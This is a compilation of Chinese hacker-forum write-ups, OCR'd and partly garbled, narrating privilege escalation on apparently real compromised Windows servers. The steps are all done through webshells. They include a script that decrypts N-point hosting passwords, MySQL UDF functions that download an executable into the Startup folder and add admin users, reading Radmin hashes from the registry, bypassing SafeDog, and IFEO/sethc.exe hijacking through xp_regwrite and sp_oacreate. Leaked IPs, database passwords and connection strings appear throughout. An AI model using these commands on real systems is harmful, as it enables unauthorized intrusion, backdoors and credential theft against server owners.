正在应用个人设置			

第6节记一次 N 点提权

作者:回眸、龙少 来自:法客论坛-F4ckTeam 地址:http://team.f4ck.net

关于怎么拿到 SHELL 我就不说了。 下面我看看 SHELL 权限

	_	
WEB服务器版本		Microsoft-IIS/6.0
Scripting.FileSystemObject	\sim	文件操作组件
wscript.shell	~/	命令行执行组件,显示' ×'时用 执行Cmd二 此功能执行
ADOX.Catalog	~/	ACCESS 建 库 组 件
JRO. JetEngine	~/	ACCESS 压 缩 组 件
Scripting.Dictionary	~/	数据流 上 传 辅助 组件
Adodb. connection	~/	数据库 连接 组件
Adodb.Stream	\sim	数据流 上传 组件
SoftArtisans.FileUp	×	SA-FileUp 文件 上传 组件
LyfUpload. UploadFile	×	刘云峰 文件 上传 组件
Persits. Upload. 1	×	ASPUpload 文件 上传 组件

权限很大哦,我们找个可写的目录穿上我们的 CMD 看看能不能执行。

也全立件本相由是。	C · \WINDOWS\TRMP	히는 하면,	

文件夹: C:\WINDOWS\TEMP\vmware-SYSTEM 不可读,不可写。

注意: 不要多次刷新本页面, 否则在只写文件夹会留下大里垃圾文件!

返回

C:\WINDOWS\TEMP 可读可写。我们穿个 CMD.exe 上去看看 我们用 aspx 木马执行 cmd 命令吧

以行命で>>	
Cmd路径·	
C:\WINDOWS\TEMP\cmd.exe	
谙 问:	11.7
/c Set	执行
ALLUSERSPROFILE=C:\Documents and Settings\All Users	
APP POOL ID=hostix 1	
ClusterLog=C:\WINDOWS\Cluster\cluster.log	
CommonProgramFiles=C:\Program Files\Common Files	
COMPUTERNAME=QC-E69L09I	
ComSpec=C:\WINDOWS\system32\cmd.exe	
FP_NO_HOST_CHECK=NO	
NUMBER_OF_PROCESSORS=1	
OS=Windows_NT	
Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\php iis\php	
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH	
PROCESSOR ARCHITECTURE=x86	
PROCESSOR IDENTIFIER=x86 Family 6 Model 44 Stepping 2, GenuineIntel	
PROCESSOR LEVEL=6	
PROCESSOR REVISION=2c02	
ProgramFiles=C:\Program Files	
PROMPT=SPSG	
SvstemDrive=C:	
SystemRoot=C:\WINDOWS	
TEMP=C:\WINDOWS\TEMP	
TMP=C:\WINDOWS\TEMP	
USERPROFILE=C:\Documents and Settings\Default User	
windir=C·\WINDOWS	
and of any one	

可以执行,我们看看服务器的用户吧,。命令 net user

执行命令>>	
Cmd路径: C:WINDOWS\TEMP\cmd.exe	
语句:	
/c net user	执行
Copyright © 2011-2021 08小组 All Rights Reserved.	

我靠不能执行,怎么办? 此致我没了性欲了。当时在网吧,网吧下午人爆满,好多年轻的孩子在我后面看,我当 时不好意思,也没仔细的看,当时就关了 SHELL 我就去游戏了。 下机后我回家的路上一直在想怎么提权,回去后吃一碗烩面。 晚上我在家上网.打开我的 VPN,继续看,。 我打开我的 ASPX 木马,随便点开看了一下,当我点到 用户信息 这个功能的时候我看 到这个情况。看图

退出登录丨文件(夹)管理丨Cmd命令丨IIS探测丨系统进租	呈丨系统服务丨用户 <mark>(组)信息丨系</mark> 统信息丨文件搜索 <mark>丨Serv-U提</mark> 权丨注册表查询丨端I
用户(组)信息 >>	
AccountType	512
Caption	QC-E69LO9I\17a0com
Description	N <u>点虚拟主机管理系统</u> V1.9版 创建于:2012 -6- 22 15:34:12
Disabled	False
Domain	QC-E69LO9I
FullName	17a0com主机账号-NPOINTHOST V1.9
InstallDate	
LocalAccount	True
Lockout	False

当时一看头就晕了,N点虚拟主机,我第一次搞这个。 于是我去找了1下度娘。 http://www.2cto.com/Article/201207/141183.html http://hi.baidu.com/thinkpig007/item/8d9e83336a2d6527b3c0c55c 大家去看看吧

7	hubeiwuhan	a123456bcd	:80:xww.51b2.net :80:30:angu.2xcm :80:51b1.net :80:51b1.net :80:88:0.net :80:88:0.net :80:88:0.cn :80:58:0.cn :80:58:0.cn :80:88:4.cn :80:88:4.cn	D:\webhast\hubeiwuhan\web
8	jingtuwang	a123456bcd	:80:jingtuwang.www.npointhost.com :80:www.jiongtuwang.net :80:jiongtuwang.net	D:\webhost\jingtuwang\web
9	ND19_rpjtp	nP0InT19xND19_rpjtp	:8014:59.188.236.41	C:\Program Files\NpointSoft\npointhost1.9.6\web\
10	gongnunimei	ə123456bcd	:80:gongrunimel.www.npointhost.com :80:www.i20mu.com :80:120nu.com :80:94baidu.com :80:17a0.org :80:17a0.org :80:www.i7a0.org :80:www.iorgilian168.com :80:www.iorgilian168.com :80:www.iorgilian168.com :80:www.iorgilian168.com :80:www.iorgilian168.com :80:www.iorgilian168.com :80:www.iorgilian168.com :80:www.iorgilian168.com :80:www.iorgilian168.com	D:\webhast\gongnunimei\web

看这个图,一般 N 点虚拟主机的目录都在这里, 哈哈我的人品爆发..正好我的 ASPX 能 IIS 探测 我进 N 点虚拟的目录简单看了 1 下。

当前文件(创建新的文件各租所文件) C:\Program Files\NpointSoft\npointhost1.9.6\web\inc\conn.asp					
文件內容 "ActSQLBD- XXXXXX * '* strSQLServerName="." '* strSQLDBUserName="xxx" '* strSQLDBPassword="xxxxxx" '* strSQLDBPame="xxxxxxxx" '*	为MSSQL数据库服务器名或IP地址 默认为 "." 为MSSQL数据库服务器名或IP地址 默认为 "." 为MSSQL数据库 用户名 为MSSQL数据库 密码 为MSSQL数据库 名称 如: strSQLDBName="Npoi	* * * * * * * * * * * *			
*** setsqltype=1 AccSQLdb="\host_date\\$host \$ date\$196.mdb" strSQLServerName="." strSQLDBDasword="123456" strSQLDBDasword="123456" strSQLDBName="NpointHost_date"					
*** '* N点虚拟主机管理系统 - Powered by np '* N点官方站点: http://www.npointhost.com '* N点作者QO: 9558659 '* N点建议您>>非专业人员,请不要修改以下代	oint 词内容.	*			
*** 提交 返回 Copyright © 2011-2021 08小组 All Rights Reserv	ed.				

Sa 123456 当时我傻把垃圾的就去链接 mysql 结果链接失败

于是我又去仔细看了一下度娘给的资料 于是我吧 N 点的数据库下载了出来。

文件 (文件(夹)管理 >>					
当解目来: C:VPogram Files Npoints of Npoints of Npoints (1.9.5)web/nost_date/ 阿站目录 木马目录 新建目录 解理Oxable(A:) 磁盘(C:) 磁盘(D:) CDRom(E:) 木马自杀						
	文件(夫)名	最后修改时间	大小			
	Parent Directory					
	#host # date#196.ldb	2012-07-27 05:52:00	192 B			
	#host # date#196.mdb	2012-07-26 09:05:33	472.00 K			
	Delete selected					
Codvrid	covright @ 2011-2021 08/사쉨 All Rights Reserved.					

数据库查看密码工具拿出来看了一下,

SJOSKW4QQFQ9CONBFOQOJYWQ@GD	FQ9CONBFOQOJYWQ@GD

Root 当时我一看就兴奋啊,于是我点开了密码一看,蛋疼啊

HFAPM5G152K13CW9HY90JRRQU@KAIMNDLHBC@NGKGLNMIIMLHFCACHFEF HBDHKJHJHCLDHCBHBJBCHNELHIGDDBHBCOFAEOBFDEHHKENGAOOKNFKA ABGNEA@GBNALABDGJCOMLFLINLMKEEOAHDAAKC@KNIJKOKBMNOEJJIJN OMGCGKDJFDNIDCNILIDKEELLEHDNLHDMKHGLNKABANI@N@C 哦买噶。加密了。

```
由于我能直接 能翻到 n点管理平台 目录 所以我就 修改了个登陆 语句 就进去了。 瞎翻了下发现也不是那么好玩(后来提完权 闲
着没事 仔细的看了下 发现是可以直接拿服务器权限 并不是像n点官方宣传的那样进了管理页面也不能拿到服务权限。) 我直接用
了最管用的办法 下载n点管理平台的数据库。通过数据 顺利 找到 sa 密码 和root 密码。
sa 和root 所在的表hostcs:
密码都是 特殊加密的 不是常见的 如: JATEA@IOCBGMIBHDKCPCJIDNJFFCEF@KDNFMLOOMILHL@E
解密方法 如下:
<!--#include file="inc/conn.asp" -->
<!--#include file="inc/conn.asp" -->
<!--#include file="inc/char.asp" -->
<!--#include file="inc/char.asp" -->
<%
set iishost=server.CreateObject("npoint.host")
x=iishost.Eduserpassword("JATEA@IOCBGMIBHDKCPCJIDNJFFCEF@KDNFMLOOMILHL@E",0)
response.write x
%>
```

将此文件保存至 n点的 web 目录 任意.asp结尾的 文件 然后访问

于是我照着资料操作。当时把改好的 asp 准备传到 N 点的根目录。可是蛋疼的问题又出来了,不让我写,哎,于是我去找大牛问问怎么办,大牛说本地搭建一个环境。 我当时听了就下气了,我根本就不了解 N 点。怎么办啊,于是我想到 ASP 木马有个工 具是远程下载,哈哈、当时把我准备好的 ASP 文件传到 SHELL 目录里面然后用 ASP 木马的远程下载功能下载到了 N 点的目录里面

admin.asp
foot.asp
index.asp
logout.asp
main.asp
mima.asp
top.asp
usersession.asp
Delete selected

这个 mima.asp 文件就是我修改好的文件,人品爆发啊。既然成功了。 我立马打开 http://59.188.236.41/mima.asp



哦买噶,终于出来,马上打开我的 PHP 木马用 MYSQL 提权这个功能连接

文件管理			执行属	े देग्री	
批重挂马	地址 localhost	端口 3306	用户 root	密码 ZTZOAP7vstyfd	TM7 库名 mysql
批量清马		可加载路径 C:/windows/m	ysqlDll.dll		导出DLL
批量替换		令集合 ▼ netstat -a	n <u>-</u>		执行
查找木马	TCF	0.0.0.0:80	0.0.0.0:0	LISTENING	
系統信息	TCF	0.0.0:135	0.0.0.0:0	LISTENING	
执行命令	TCF	0.0.0.0:445	0.0.0.0:0	LISTENING	
组件控口	TCF	0.0.0:1025	0.0.0.0:0	LISTENING	
	TCF	0.0.0.3306	0.0.0.0:0	LISTENING	
端山扫描	TCF	0.0.0.0:8014	0.0.0.0:0	LISTENING	
网马转换	TCF	0.0.0.0:8080	0.0.0.0:0	LISTENING	
扫弱口令	TCF	0.0.0.0:33890	0.0.0.0:0	LISTENING	
Linux提权	TCF	59.188.235.43:21	0.0.0.0:0	LISTENING	_
IYSQL提权					
IYSQL语句					
IYSQL管理					
退出系统					

查看一下端口,他把 3389 的端口改成了 33890 哈哈,马上添加用户

文件管理			执行	成功	
批量挂马	地 <u>址</u> localhost	端口 3306	用户 root	密码 ZTZOAP7vst	yfdTM7 库名 mysql
批量清马	Ē	J加载路径 C:/window	s/mysqlDll.dll		导出DLL
批重替换	命: 命令成	》集合 ▼ net use 功完成。	r 123 123 /add		执行
查找木马					
系统信息		micceed			
执行命令		Succesu:			
组件接口					
端口扫描					
网马转换					
扫弱口令					
Linux提权					
MYSQL提权					v
MYSQL语句					
MYSQL管理					
退出系统					
			Microsoft-IIS/6.0		

结果成功了哈哈。远程链接去



OK 成功了

第7节在 CMDSHELL 无法执行情况下 MYSQL 的提权

作者: Tr0jan

来自:法客论坛-F4ckTeam

地址: http://team.f4ck.net

.

MYSQL5.5 如果没有 LIB 目录权限允许的情况下,可以新建,在此帖子中可以正常导出 DLL,

自带命令:

创建cmdshell 🗸 提交

自定义SQL语句:

~
→ 执行

回显结果:

SQL语句:select cmdshell('net u	ser \$darkmoon	~
123456 /add & net localgroup a	dministrators	
\$darkmoon /add')		-
Shell无法启动,GetLastError-She	11无法启	10
动,GetLastError=Shell口		41
	Cocurity	Team
		I Gam

但是执行 CMDSHELL 的时候,执行出错,我们在这里有两个方法可以考虑

1、利用 downloader 函数,下载一个木马或者脚本到启动项

Create Function downloader returns string soname 'moonudf.dll';

select downloader("http://www.xx.com/xx.exe","C:\\Documents and Settings\\All Users\\ 「开始」菜单\\程序\\启动\\a.exe");

然后利用 SHUT 函数重启服务器

create function shut returns string soname 'moonudf.dll'

select shut('reboot');

但是在这个 SHELL 中,无法下载到启动项没有权限。

2、利用 regwrite 和 regread 函数劫持 Sethc.exe

. Create Function regread returns string soname 'moonudf.dll';

Select regread("HKEY_LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe", "debugger")



C:\WINDOWS\system32\sothc.exe

可以看到已经被劫持了,我们重新写入注册表,首先上传我们的 CMD.EXE

也址:	C:\tmp\	
		□ cmd.oxe [Edit Del 根腺√Copy Move] - 80K 应用程序 - 2012-9-25 13:09:28
→程 序目	录	

利用 regwrite 写入

①Create Function regwrite returns string soname 'moonudf.dll';

 $@select\ regwrite("HKEY_LOCAL_MACHINE", "SOFTWARE \ Windows \\ \\$

NT\\CurrentVersion\\Image File Execution

Options\\sethc.exe","debugger","REG_SZ","C:\\tmp\\cmd.exe"); 登陆服务器



第8节 Radmin 提权服务器过程

作者: slip2008 来自: 法客论坛-F4ckTeam 地址: http://team.f4ck.net

• • • • • •

Asp 的权限太低了,换了.net 的脚本吧,执行命令应该不成问题。

[*] 基本信息 [C:D:E:F:]								
1: \web\					i> netstat −an find "ESTABLISHED"			
TCP	202.113.	. 9		:80	123.62.24.168:6853 ESTABLISHED			
TCP	202.113.	9		:80	180, 153, 240, 69; 47434 ESTABLISHED			
TCP	202.113.	9		:80	183.31.86.210:31451 ESTABLISHED			
TCP	202.113.	9		:80	183.31.86.210:31456 ESTABLISHED			
TCP	202.113.	9		:80	183.31.86.210:31458 ESTABLISHED			
TCP	202.113.	9		:80	183.31.86.210:31459 ESTABLISHED			
TCP	202.113.	9		:80	183.31.86.210:31460 ESTABLISHED			
TCP	202.113.	9		:443	123.62.24.167:18246 ESTABLISHED			
TCP	202.113.	9		:443	123.62.24.167:29533 ESTABLISHED			

察看下在开放的端口

收集一下主机信息吧。有惊喜,看到了 radmin ,看一下版本,是不是 2.X 的。



radmin 2.1

直接注册表中的读取端口和密码,然后用 radminhash 版本就可以登录哈。上图不多说。

reg query "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameter

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters **NTAuthEnabled REG BINARY** 00000000 Parameter **REG BINARY** 59289B09A5338F60CF54D3B1EE5B20FC Port BB010000 **REG BINARY** Timeout **REG BINARY** 0A00000 EnableLogFile **REG_BINARY** 0000000 LogFilePath REG SZ c:\logfile.txt 0000000 FilterIp **REG_BINARY** DisableTrayIcon 00000000 **REG_BINARY** AutoAllow 00000000 **REG_BINARY** AskUser **REG_BINARY** 0000000 EnableEventLog **REG_BINARY** 0000000



端口和密码

接着就是换算端口了,打开计算器,点十六进制,然后输入01BB(注意是从后往前进行输入)

🛿 计算器	#								_	. 🗆 🗙
扁報(匠)	查看(と	() 帮助	ታ(<u>ዝ</u>)							
								1	BB	
• +>	⇒进制 0	十进制	107	(进制 〇 二进制	• 四字	- O 2	救字	〇 单字	0	字节
🗌 Inv	[]	Кур				Backsp	ace	CE		С
Sta	F-E	- C		MC	7	8	9	1	Mod	And
Ave	dmis	Exp	ln	MR	4	5	6	*	0r	Xor
Sum	sin	x^y	log	MS	1	2	3	-	Lsh	Not
Ξ	cos	x^3	nl	M+	0	+/-		+	=	Int
Dat	tan	x^2	1/x	pi	A	В	C	D	E	F

计算端口

📓 计算器	ł										. 🗆 X
编辑(E)) 青査	() 帮助	ታ(ዘ)								
	_		_						44	13.	
〇 十六	;进制 0) 十进制	1 O J	(进制 0	二进制	● 角周	₹ 0	弧度	○ 梯度	ŧ	
T Inv		Нур					Backsp	ace	CE		C
Sta	F-E	- C		MC		7	8	9	1	Mod	And
Ave	dmis	Exp	ln	MR		4	5	6	*	0r	Xor
Sum	sin	х^у	log	MS		1	2	3	-	Lsh	Not
s	cos	x^3	n!	M+		0	+/-		+	=	Int
Dat	tan	x^2	1/x	pi		A	В	С	D	E	F

最后的端口是 443

最后把 59289B09A5338F60CF54D3B1EE5B20FC 换算成小写字符

59289b09a5338f60cf54d3b1ee5b20fc 直接例如,如下图所示



直接登陆进服务器



最终通过 winlogonhack 把密码抓取了进来,其中使用了 Saminsde, minikaz 提权神器, 都无法抓取到相应的 hash。。

第9节记一次突破安全狗传马提权

作者: ali 来自: 法客论坛-F4ckTeam 地址: http://team.f4ck.net

····· 提示成功菜刀连接之

. (Iree)adsny)						
238.248.143	目录(7), 文件(81)	名称	时间			
• C:		🚞 ad	2012-08-26 01:27:06			
• D:		admin	2012-08-26 01:27:06			
• E:		i bbs	2012-08-26 01:27:06			
• F:		C bdatebase	2012-08-26 01:27:06			
G:		C cnscu.cn	2012-08-26 12:04:39			
free free		down	2012-08-26 01:27:06			
adshy		i webadmin	2012-08-26 01:27:07			
ad ad		C.asp	2012-08-29 02:12:05			
i hhr	in the second	1.aspx	2012-10-02 12:11:50			
D bda	tehase	1.ipg	2012-08-08 23:07:19			
C cns	ebase vu.cn 	l. cn Imin	11.asp	2012-08-29 02:22:27		
down			min		🚤 📷 222.jpg	2012-08-08 23:07:19
🗀 web:				404.php	2012-09-08 21:46:29	
		9.php;9.jpg	2012-10-06 19:59:48			
		90sec.asp;90sec.jpg	2012-08-29 17:18:34			
		(92c.asp;92c.jpg)	2012-10-02 12:34:10			
		(in the second s	2012-09-08 20:59:41			
		9c.aspx;9c.jpg	2012-08-29 17:07:46			
		💼 ;a.php;a.jpg	2012-10-02 14:50:23			
		ic.asp;c.jpg	2012-10-02 14:31:27			
		💼 ;c.php;c.jpg	2012-10-02 16:11:45			
		Eni pestate pest	2012-08-29 17:34:16			

试试能不能执行命令。



组件被删了, 上个大马试试

探测支持 php. 扫了下端口 127.0.0.1:21.....开放 127.0.0.1:1433....开放 127.0.0.1:3389......关闭 127.0.0.1:43958....开放 127.0.0.1:3306.....开放

想到了利用数据库提权,翻了些文件夹,找连接数据库之类的文件,结果都不能,是免费建站的, 能到的程序都是一样的。。

看了些 c 盘可读,翻到了 mysql 的目录,我当时就笑了。。。。



该死的土狗。。

我又想了下,我能不能把他复制一下,后缀改成了11。。

恭喜您文件 c:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.MYI 复制成功! 成功下载

用记事本读不全,果断换 phpmyadmin

priv Ins
Y
Y

跑去破密,结果是收费的,谢谢群里的朋友帮我破密 传了个 php 的马,成功导入 udf 支持 whoami,回显 system 我那个鸡冻啊。。 结果还是不能添加用户,狗拦截了。。 想到了 shift.但是一直没成功。过滤了\ 问了 Tr0jan 大牛 他说用两个\就可以了,执行之后还是不行 成功复制了但是还是没有劫持。。 还是没有头绪。。 想到了前段时间疯子大牛发的一个杀狗神器 果断试下。 执行后回显成功,但是在任务列表里面仍然有安全狗,我心都凉了半截。。 管不了那么多了。继续添加。读取 3389 端口。连接之。成功登陆。。 杀狗神器的确是神器,各种需要。



服务器爆卡,简单的擦了屁股走人。

≧狗(IIS版) 插件已经安装	,总防护功能开启。
	90036

第10节记一次有趣的提权--IFEO劫持

作者: guset 邮箱: manage@f4ck.net 来自: 法客论坛-F4ckTeam 地址: http://team.f4ck.net

Shell 是双面大牛给的,在我打算看《轩辕剑》的时候,面面大牛说我无聊就让我看看提权,俺立马 没了兴趣,为啥,双面大牛都没有搞定的,我能搞定吗..但是发现这个网速看电影真的没用。还是硬 着头皮上咯!

一看是 aspx 的,先扫描下开启了什么端口

端口扫描 >>	
IP: 127.0.0.1 Port:	21,25,80,110,1433,1723,3306,3389,4899,5631,4: Scan
127.0.0.1 : 21	Close
127.0.0.1 : 25	Close
127.0.0.1 : 80	Open
127.0.0.1 : 110	Close
127.0.0.1 : 1433	Open
127.0.0.1 : 1723	Close
127.0.0.1 : 3306	Open
127.0.0.1 : 3389	Open
127.0.0.1 : 4899	
127.0.0.1 : 5631	Close
127.0.0.1 : 43958	Open
127.0.0.1 : 65500	Close

1433, 3306, 43958 对应的 MSSQL、MYSQL 和 Serv-U。 先来看看 Serv-U 是不是可以提权(PS: 要是这么容易就搞定了面面大牛会看上我吗?)。

由于目标机器积极拒绝,无法连接。							
erv-U Exec >>							
UserName : localadministrator CmdShell : cmd.exe /c net use Exploit	PassWord: Port: #1@\$ak#.lk;0@P 43958 r 220 Serv=U FTP Server v6.4 for WinSock ready user localadministrator 331 User name okay, need password. pass #1@\$ak#.lk;0@P 230 User logged in, proceed.						
230-Switching to SYSTEM MAINTENANCE mode.							

提示:由于目标机器积极拒绝,无法连接。

问面面大牛,说是 Serv-U 服务暂停了,那这条路堵死了。下面来看看执行命令

	拒绝访问。	
执行命令 >>		
路径: c:\windows\system32\cmd.exe		
参数: /c Set		提交

居然自带的 c:\windows\system32\cmd.exe 不能执行,那咱们换个可读写的目录上传一个试试

文件管理器 >>

当前目录: F:\umail\mysql\									
	网站 CDR	<u> </u>	浏览… 上传						
		文件名	最后修改	大小	动作				
(0	☆ <u>目录</u>							
(0	bin	2012-08-18 03:44:16		删除 重命名				
4	0	<u>data</u>	2012-08-18 03:44:16	-	删除↓重命名				
		cmd.db	2012-08-18 08:35:06	460.00 K	<u>下载 复制 编辑 重命名 时间</u>				
然后再执行试试									
路径:									
F:\umail\mysql\cmd.db									
4	÷								

参数: /c Set

ALLUSERSPROFILE=C:\Documents and Settings\All Users APP_POOL_ID=DefaultAppPool ClusterLog=C:\WINDOWS\Cluster\cluster.log CommonProgramFiles=C:\Program Files\Common Files COMPUTERNAME=CAANETSERVER ComSpec=C:\WINDOWS\system32\cmd.exe DEFLOGDIR=C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection FP_NO_HOST_CHECK=NO NUMBER_OF_PROCESSORS=4 OS=Windows_NT Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Program Files\Microsoft SQL Server\80\Tools\BI: PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 15 Stepping 11, GenuineIntel PROCESSOR LEVEL=6

然后继续 systeminfo 来看看

提交
路径:

F:\umail\mysql\cmd.db

参数:

/c systeminfo

提交

CAANETSERVER 主机名: OS 名称: Microsoft(R) Windows(R) Server 2003, Enterprise Edition OS 版本: 5.2.3790 Service Pack 2 Build 3790 OS 制造商: Microsoft Corporation OS 配置: 独立服务器 Multiprocessor Free OS 构件类型: 注册的所有人: 注册的组织: 产品 ID: 69813-652-8169756-45778 初始安装日期: 2011-11-22, 12:55:57 22 天 10 小时 33 分 53 秒 系统启动时间: 系统制造商: IBM 系统型号: IBM System x3650 -[7979I09]-系统类型: X86-based PC 安装了 4 个处理器。 处理器: [01]: x86 Family 6 Model 15 Stepping 11 GenuineIntel ~1995 Mhz [02]: x86 Family 6 Model 15 Stepping 11 GenuineIntel ~1995 Mhz [03]: x86 Family 6 Model 15 Stepping 11 GenuineIntel ~1995 Mhz [04]: x86 Family 6 Model 15 Stepping 11 GenuineIntel ~1995 Mhz DTOC MET. TDH 1000 其实吧,重点是补丁信息 [221]: KB2616676-v2 - Update [222]: KB2618444 - Update [223]: KB2618451 - Update [224]: KB2620712 - Update [225]: KB2621440 - Update [226]: KB2624667 - Update [227]: KB2631813 - Update [228]: KB2633171 - Update [229]: KB2638806 - Update [230]: KB2639417 - Update [231]: KB2641653 - Update [232]: KB2641690-v2 - Update [233]: KB2644615 - Update [234]: KB2645640 - Update [235]: KB2646524 - Updat 问面面大牛,他说补丁全满了。菜鸟不信,果断的多次测试,无果..发现面面大牛果然没有说错。



他突然说是有人日过了,我就看看留下什么蛛丝马迹没

执行命令 >>

<u>路径:</u>

F:\umail\mysql\net1.exe

参数:

localgroup administrators

别名 administrators

注释 管理员对计算机/域有不受限制的完全访问权

成员

admin\$ administrator ASP.NET caanetadmin nimda 命令成功完成。

居然还有隐藏的帐号,看来确实是被 KO 的惨了,经过多次尝试弱口令,和想象的一样,没有进去, 话说 RP 确实是差到了极点。再说也没有那个大牛会留下这样的弱口令吧。既然都死了,那再看看 1433 了。

当前文件(导入新的文件名称和新的文件) e:\caanet\conn\conn.asp

文件内容

```
<!--#include file="antisqlinj.asp"-->
<%
set conn = server.CreateObject("adodb.connection")
connstr = "driver={sql server};uid=wwwdb;pwd=sdpocxndc!79;d
conn.open connstr
%>
```

顺利的找到了配置文件。嘿嘿,还是 mssql 的,看来有希望啊,可是不是 SAa,啊,麻烦了。管他的, 连接去试试呗...

数据库 >>

ConnString: server=localhost;uid=wwwdb;pwd=sdpocxndc!79;database=fasA55llJK#@1m;Provider=SQLOLEDB

MSSQL Version : Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Micro NT 5.2 (Build 3790: Service Pack 2)

SrvRoleMember : sa

Please select a database :	Select a DataBase 👻	SQLExec :	SQL Server Exec	•
Run SQL				
Query				

吐槽下,这人品,哈哈,其实 RP 也不差嘛,居然是 SA, Microsoft SQL Server 2000。

那么来看看 xp_cmdshell 是不是存在,直接来增加 xp_cmdshell 组建 Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')

	数据库中已存在名为 'xp_cmdshell' 的对象。
数据库 >>	
ConnString :	server=localhost;uid=wwwdb;pwd=sdpocxndc!79;database=fasA55IIJK#@1m;Provider=SQLOLEDB
MSSQL Versio NT 5.2 (Build	on : Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Micr 3790: Service Pack 2)
SrvRoleMemb	ber : sa
Please select	a database : Select a DataBase 👻 SQLExec : Add xp_cmdshell 👻
Run SQL	
Use master	<pre>dbcc addextendedproc('xp_cmdshell','xplog70.dll')</pre>
既然存在,	那么就来直接执行命令呗
Exec master	:.dbo.xp_cmdshell 'whoami'
	xpsql.cpp: 错误 5 来白 CreateProcess (第 737 行)

数据库 >>

ConnString: server=localhost;uid=wwwdb;pwd=sdpocxndcl79;database=fasA55IIJK#@1m;Provider=SQLOLEDB

MSSQL Version : Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Micr NT 5.2 (Build 3790: Service Pack 2)

SrvRoleMember : sa

	•
Run SQL	
Exec master.dbo.xp_cmdshell 'whoami'	

xpsql.cpp: 错误 5 来自 CreateProcess (第 737 行)

还真没有遇见过。搜索下.遇到这个困扰的,人还不少。原来。错误 5 是个系统提示的错误号, CreateProcess 这个是创建线程的意思,这个错误产生和系统文件 cmd.exe 有很大的关系,一种情况 是 cmd 被删除,一种是 cmd 的权限被降低了。

那貌似是路被堵死了,然后想起穿山甲上的执行命令的有两个组建。除了 xp_cmdshell 外还有 sp_oacreate 可以执行命令

用 cmd 替换 sethc..

declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32\sethc.exe';

	无法在库 odsole70.dll 中找到函数 sp_oacreate。原因: 127(找不到指定的程序。)。
数据库 >>	
ConnString :	server=localhost;uid=wwwdb;pwd=sdpocxndc!79;database=fasA55IIJK#@1m;Provider=SQLOLEDB
ASSQL Version VT 5.2 (Build 3 StyRoleMembe	n : Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation (3790: Service Pack 2) er : sa
Please select : Run SQL	a database : Select a DataBase 👻 SQLExec : XP_cmdshell exec 👻
declare @o sp_oamethod \sethc.exe'	<pre>int exec sp_oacreate 'scripting.filesystemobject', @o out exec d @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32 ';</pre>
无法在库	odsole70.dll 中找到函数 sp oacreate。原因: 127(找不到指定的程序。)。然后一直删除

再恢复后

但是 我再次 使用

declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32\sethc.exe';

无法在库 odsole70.dll 中找到函数 sp_oacreate。原因:127(找不到指定的程序。)。

	无法在库 odsole70.dll 中找到函数 sp_oacreate。原因: 127(找不到指定的程序。)。
数据库 >>	
ConnString :	server=localhost;uid=wwwdb;pwd=sdpocxndc!79;database=fasA55IIJK#@1m;Provider=SQLOLEDB
MSSQL Version NT 5.2 (Build 3	: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporat 790: Service Pack 2)
SrvRoleMemb	r: sa
Please select	database : Select a DataBase 👻 SQLExec : XP_cmdshell exec 👻
Run SQL	
declare @o sp_oamethod \sethc.exe'	nt exec sp_oacreate 'scripting.filesystemobject', @o out exec @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32

原因我也没懂...搞了近乎一个下午。还是无果...

翻书的时候突然看见 IFEO 劫持... 既然我们是介绍 IFEO 技术相关,那我们就先介绍下: 一,什么是映像胁持(IFEO)?

所谓的 IFEO 就是 Image File Execution Options

在是位于注册表的

 $\label{eq:hkey_local_machine} HKey_local_MACHINe\SOFTWARe\Microsoft\Windows\ NT\Current\Version\Image\ File\ Execution\ Options$

由于这个项主要是用来调试程序用的,对一般用户意义不大。默认是只有管理员和 local system 有权 读写修改

那就来玩一次 IFEO 劫持 EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',

@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',

@value_name='Debugger',

@type='REG_SZ',

@value='C:\WINDOWS\system32\cmd.exe'

数据库 >>

ConnString: server=localhost;uid=wwwdb;pwd=sdpocxndc!79;database=fasA55IIJK#@1m;Provider=SQLOLEDB

MSSQL Version : Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation. NT 5.2 (Build 3790: Service Pack 2)

SrvRoleMember : sa

Please select a database : Select a DataBase 👻 SQLExec : SQL Server Exec	•
Run SQL	
EXEC masterxp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft	
\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',	
<pre>@value_name='Debugger', @type='REG_SZ', @value='C:\WINDOWS\system32\cmd.exe'</pre>	
	é

没有出错...嘿嘿...

那我们来查看是否劫持成功

